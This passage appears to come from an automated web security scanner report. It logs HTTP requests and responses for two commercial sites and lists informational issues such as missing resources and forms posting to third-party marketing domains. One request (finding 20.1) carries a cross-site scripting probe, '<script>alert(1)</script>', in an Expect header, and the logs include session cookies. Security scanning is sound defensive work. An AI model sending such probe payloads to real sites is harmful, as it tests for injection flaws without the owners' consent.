X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script type="text/javascript">
       <!--//
       try {
        if (top.location.hostname != self.location.hostname) throw 1;
       } catch (e) {
        top.location.href = self.location.href;
       }
        //-->
       </script>
<title>Quantum Jumping - Communicate With Your Subconscious Mind</title>
<!-- meta tags start -->
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="all" />
<meta name="description" content="Discover Quantum Jumping. Jump Into a Universe of Infinite Possibilities & Learn to Be a Master of Your Mind. Sign up for the Free Introductory Course" />
<meta name="keywords" content="Quantum Jumping,Burt Goldman, Parallel-Universes, Astral Projection, Master Skill," />
        <!-- meta tags end -->
<style type="text/css">
<!--
@import url("/media/themes/prodigy/common.css");
@import url("/media/themes/qja.css");
-->
</style>
<!-- style end -->

<!--[if lte IE 6]><style type="text/css" media="all">
@import url("/media/themes/ie6.css");
</style><![endif]-->

<!--[if IE 7.0]><style type="text/css" media="all">
@import url("/media/themes/ie7.css");
</style><![endif]-->

<!--[if IE]>
           <style type="text/css" media="all">
    @import url("/media/themes/ie.css");
    </style>
           <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
       <![endif]-->

<script src="/media/javascripts/jquery.min.js" type="text/javascript"></script>



<SCRIPT language="JavaScript" type="text/javasc
...[SNIP]...

19.5. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Request 1

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href=
...[SNIP]...

Request 2

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:46 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.quantumjumping.com/blog/wp-includes/wlwmanifest.xml" />


<link rel="alternate" type="application/rss+xml" href="http://www.quantumju
...[SNIP]...

19.6. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

Request 1

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=index HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:56 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:55 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 137

#item_2 {
   width: 250px;
   height: 115px;
   }

#item_1 {
   width: 640px;
   height: 115px;
   }

#item_348 {
   width: 960px;
   height: 115px;
   }

Request 2

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=index HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:16 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:14 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 137

#item_2 {
   width: 250px;
   height: 115px;
   }

#item_1 {
   width: 640px;
   height: 115px;
   }

#item_348 {
   width: 960px;
   height: 115px;
   }


19.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

Request 1

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:23 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:24 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href=
...[SNIP]...

Request 2

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:55:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:55:25 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:55:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.quantumjumping.com/blog/wp-includes/wlwmanifest.xml" />


<link rel="alternate" type="application/rss+xml" href="http://www.quantumju
...[SNIP]...

19.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

Request 1

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:28 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:29 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href=
...[SNIP]...

Request 2

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:55:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:55:37 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:55:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http://gmpg.org/xfn/11">    
<title>No Results Found | Quantum Jumping Blog</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />



<meta name="keywords" content="Alternate Universes, Introductory Course" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=four04" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/style.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/custom.css" media="screen, projection" />
<link rel="stylesheet" type="text/css" href="http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/print.css" media="print" />

<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.quantumjumping.com/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.quantumjumping.com/blog/wp-includes/wlwmanifest.xml" />


<link rel="alternate" type="application/rss+xml" href="http://www.quantumju
...[SNIP]...

20. Cross-domain POST  previous  next
There are 10 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


20.1. http://www.medicalcareersdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalcareersdirect.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain schools.collegeoverview.net. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalcareersdirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.7.67
Date: Wed, 04 May 2011 03:07:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie,Accept-Encoding
Content-Length: 6178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <title>Medi
...[SNIP]...
</span>
               <form method="post" action="http://schools.collegeoverview.net">
                   <table cellpadding="0" cellspacing="0" class="fr" >
...[SNIP]...

20.2. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
<div class="modal-window-form">

   <form class="yellow modal" action="http://moonraymarketing.com/form_processor.php" method="post" onsubmit="return checkForm733(this);">
<input type="hidden" name="uid" value="p2c1539f38" />
...[SNIP]...

20.3. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
</div>

   <form id="asu3" class="asu wide" action="http://moonraymarketing.com/form_processor.php" method="post" onsubmit="return checkForm684(this);">
<input type="hidden" name="uid" value="p2c1539f38" />
...[SNIP]...

20.4. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain moonraymarketing.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.quantumjumping.com
